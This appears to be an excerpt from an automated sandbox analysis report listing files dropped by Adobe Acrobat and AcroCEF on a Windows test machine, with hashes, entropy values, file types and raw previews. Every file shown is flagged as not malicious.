                                                                                      MD5:3033D830A4FE40E7EE6DBAC65498FA99
                                                                                      SHA1:B0967DCBE5E7278A997438C1B5C2EBA6E306E368
                                                                                      SHA-256:35AAD99EC7DD1D2329F76DD699EF940E707D2377377DF2F1562A504FEE307507
                                                                                      SHA-512:A026B5CDD2F28E5F1E83CCCE18B7B7AFD4D07697747C6B379DF2141C79CC68CD983815930F6F738ADC4C15B73E57E1A74228D76AA8E31DB85AB932D9CCA24F87
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168895064293","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":851230},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.971824627296864
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                      MD5:F326539D084B03D88254A74D6018F692
                                                                                      SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                      SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                      SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF67fb43.TMP (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.971824627296864
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                      MD5:F326539D084B03D88254A74D6018F692
                                                                                      SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                      SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                      SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5449
                                                                                      Entropy (8bit):5.250884908057755
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7dtxaZ:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhg
                                                                                      MD5:19E53A77335F42463917D11ECCE922B8
                                                                                      SHA1:BB92EA2423152B53899D5DC35AB47B37D94BE843
                                                                                      SHA-256:A89286BB9B7C685AB71633CEDAAE9CB3121F12A21A13959B15A2F71D5EF1ABB0
                                                                                      SHA-512:7029AC327E7CF1D64349DB48F2526372B2B549C0D12B3C41679129C37D860495C8D5DD8C143CFD6130FD0289391ED70663470038DB4D57F184E2C5B00664E3A6
                                                                                      Malicious:false
                                                                                      Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):327
                                                                                      Entropy (8bit):5.2203563815732
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D59+q2PN72nKuAl9OmbzNMxIFUt8ODmO3JZmw+OD+gtVkwON72nKuAl9OmbzNMT:7D54vVaHAa8jFUt8ODxJ/+ODpT5OaHAo
                                                                                      MD5:7F1F2348E22B2773D33BC19B54D93BD1
                                                                                      SHA1:C36E952B4929E17C9F1A7216E47F8E2912B65B1B
                                                                                      SHA-256:8AFD3051AD60C482D07D90E3421196E2C3E5110DB2A6C5F1BF5892A464BB5096
                                                                                      SHA-512:1EA850C37C843E02935D0D22A029830536B55B94FB36A2DD8EA80546E5D1EBAC5A5F9835C1410E364DDDE9DF003084967188B8A44306E94E38C98B28F1F12DA3
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:03.251 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:03.273 d38 Recovering log #3.2024/12/19-06:48:03.286 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):327
                                                                                      Entropy (8bit):5.2203563815732
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D59+q2PN72nKuAl9OmbzNMxIFUt8ODmO3JZmw+OD+gtVkwON72nKuAl9OmbzNMT:7D54vVaHAa8jFUt8ODxJ/+ODpT5OaHAo
                                                                                      MD5:7F1F2348E22B2773D33BC19B54D93BD1
                                                                                      SHA1:C36E952B4929E17C9F1A7216E47F8E2912B65B1B
                                                                                      SHA-256:8AFD3051AD60C482D07D90E3421196E2C3E5110DB2A6C5F1BF5892A464BB5096
                                                                                      SHA-512:1EA850C37C843E02935D0D22A029830536B55B94FB36A2DD8EA80546E5D1EBAC5A5F9835C1410E364DDDE9DF003084967188B8A44306E94E38C98B28F1F12DA3
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:03.251 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:03.273 d38 Recovering log #3.2024/12/19-06:48:03.286 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219114808Z-226.bmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):65110
                                                                                      Entropy (8bit):0.6376462682686903
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                      MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                      SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                      SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                      SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                      Malicious:false
                                                                                      Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):86016
                                                                                      Entropy (8bit):4.445094548792511
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:ye6ci5txiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mCs3OazzU89UTTgUL
                                                                                      MD5:B42B4D7AFB2F8F9D1C273CE8B9DF4652
                                                                                      SHA1:9CF3345049BFDC964C9CC4CFABF26669C82F738F
                                                                                      SHA-256:F5FA53A83775021D11BBA83B822C8705306ACED1225FAF557C35ED2F4079AC1E
                                                                                      SHA-512:2706C26A36E2076F54AF665E7FD6CADEEDF33229927E9ABB6B213A87D9A0227F8B6A1E5E8893FB67289F14F4703F4D346F7480812BFDAD52D2C51133CFDB4689
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):3.76860070793156
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7MGJioyV1ioyxoy1C7oy16oy1TKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1OH:7ZJu1jeXjBikb9IVXEBodRBkZ
                                                                                      MD5:52CFA7BA506D4BCB2F1E714756A4A127
                                                                                      SHA1:736401759BC07FAA747ED84F2CB9123103C8C44E
                                                                                      SHA-256:CD2AE4A19F306050E39FBD48E72082F1F6983F6A5FB3736A569D046B12BBBFDD
                                                                                      SHA-512:82807A176FE3190BBFC796E8F052626E47111FE50733931622E61BA363F7E17C33650E056A468205B6DF26DD597D58E77597205D9D66FA4696814C74F486979B
                                                                                      Malicious:false
                                                                                      Preview:.... .c......h.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Certificate, Version=3
                                                                                      Category:dropped
                                                                                      Size (bytes):1391
                                                                                      Entropy (8bit):7.705940075877404
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                      Malicious:false
                                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):71954
                                                                                      Entropy (8bit):7.996617769952133
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                      Malicious:false
                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):192
                                                                                      Entropy (8bit):2.7569015731729736
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:kkFkl92OxfllXlE/HT8k6lrtNNX8RolJuRdxLlGB9lQRYwpDdt:kK5BT8jNMa8RdWBwRd
                                                                                      MD5:FADB57F478242874AB288724FBE0CBBA
                                                                                      SHA1:143205F56CE1A7BE92008B8A73C46A7118370639
                                                                                      SHA-256:A49F22345A9506D53859AEA1D7E8F61F717564714A8C18730F240348E3821642
                                                                                      SHA-512:4715D7199B5249A9015B5CA5D8E2C1911F05B029A9FF2531D127113F98F5E13CF7B881C7584A43EF2A67D46326A422DDA51D2BFD6903AF114807E620AD967B5B
                                                                                      Malicious:false
                                                                                      Preview:p...... .........K\..R..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):3.140290524202369
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKTD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:LaDnLNkPlE99SNxAhUe/3
                                                                                      MD5:6E1568317F74D34F329DB7586F8EEA09
                                                                                      SHA1:544808B5180B160F6E14982143A203BF54816456
                                                                                      SHA-256:C4D102BC3074E8FBB83A24A3399A662980B3DE0A1D71CFD9C630B670E7FB5B7E
                                                                                      SHA-512:42110ECCC594654FC8260D03514A6BF2567DFF04806FDDC3A0218773784DD9DF78AF7E0FDE8F90A28D6AB7160F06965466635C961846B8EF56D2D041D583B800
                                                                                      Malicious:false
                                                                                      Preview:p...... ..........w..R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.373157594414395
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJM3g98kUwPeUkwRe9:YvXKX1fmcgc5GMbLUkee9
                                                                                      MD5:E34878CE5BD1B6DF5B74CD742BE8310A
                                                                                      SHA1:E8E1428B92AD815003E58C579FCF537443BD3DAE
                                                                                      SHA-256:C3DF41E16B71566BE15B52C2F3462D41940AE8B4D2A5F2693B65AD4DFBDD67A7
                                                                                      SHA-512:00CF6080A8932A2ABF5278E80462C2EFA3C677FD1DF03D4618CA701AA70A533B18F2B421D173EEA9F481E5F995549CABCFF48DF9F7C6227483C99E9D7CFDFA5D
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.3269204112780555
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfBoTfXpnrPeUkwRe9:YvXKX1fmcgc5GWTfXcUkee9
                                                                                      MD5:856F1E51C25934DA14FD770850182276
                                                                                      SHA1:F25226B27C8E066EA837A3DBCD18533623123FA2
                                                                                      SHA-256:C48535AAAFFB031AFAA8A83647C221EE818ABBF191C9882AD8FE6EAC992DA327
                                                                                      SHA-512:1DFD23117C0978D7BC091499BD084B9EB649152F13260934BB1768ADB1196E9921752157A51A47F4BEE35F055824C6F3B8FE5190AB7D2B41867C30E9F8C7689A
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.305319730146486
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfBD2G6UpnrPeUkwRe9:YvXKX1fmcgc5GR22cUkee9
                                                                                      MD5:A0AB18DBD5A42379B27968EFEB24A31C
                                                                                      SHA1:2B901DD64C94DEEEA00788228F7251DED0D55E3B
                                                                                      SHA-256:01017267234F67583E88363809D1565FD650E3906933CB10A3EA36442D6BC8C3
                                                                                      SHA-512:45F140AEFBBA37ADB5BA3981FF2817651562562B4C02D5AA42C23970B03C20DC739FE7D5C6B98C9E965FD36901C3943DF06B6DC0B60826CA3ED11630FB31BD59
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):285
                                                                                      Entropy (8bit):5.353523826502795
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfPmwrPeUkwRe9:YvXKX1fmcgc5GH56Ukee9
                                                                                      MD5:C6010DE6A9C83F25D6C631D31A0C4EB2
                                                                                      SHA1:189AF0ACD6CF824DD40A971D6D784F7DD10EDC50
                                                                                      SHA-256:A8870A0363FF8461246DD335DCCDF66FDF289BB4B1C0ED75D3E24BF0EC5A34ED
                                                                                      SHA-512:6F2489DD324479A2AD4B9EA0B6B53DB3E1B87FBDD88CA7B86FF2E080D40B1F8A6CDE4F28899AC109B8F15D0C322FC494F6E0B95942B43E08029850F474E29E41
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1123
                                                                                      Entropy (8bit):5.691632891597947
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6X1fbEpLgE9cQx8LennAvzBvkn0RCmK8czOCCSTr:Yvrhgy6SAFv5Ah8cv/X
                                                                                      MD5:104BB5677C6699B062E56E7878DD8207
                                                                                      SHA1:C457658D4D01353A589F356F8D288AEA96580882
                                                                                      SHA-256:7EE8B62E385904AC9EA42B3CC7529857F660AD8263ADCF0F0A87E2AFF67DC825
                                                                                      SHA-512:5FF2CBEC7C8AF44C01772848BE05372AE6C9207426316AB13BE5084BEEA1032245FB375AC32379882F38E4C10C8D9CEB6A2758CAE0950B877F7DDF66FC6C83A7
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.304351151046977
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJf8dPeUkwRe9:YvXKX1fmcgc5GU8Ukee9
                                                                                      MD5:621553807F2FEE77C01BD871968981A7
                                                                                      SHA1:08EA23D4843B19A4C9225B297B1E3B42913A867E
                                                                                      SHA-256:6D701B17D2366E5928D86830FCAEDE15270C26D0B307F025FEF73986FE6EC7D6
                                                                                      SHA-512:7E811D5624BA5340C74CB0A344C9062CFC4802A32C2466517395E46285FC22B5953672354FCED9EBE19E7C6967943F2B2C8F505369E70D184C45AFE9A6B59DB8
                                                                                      Malicious:false
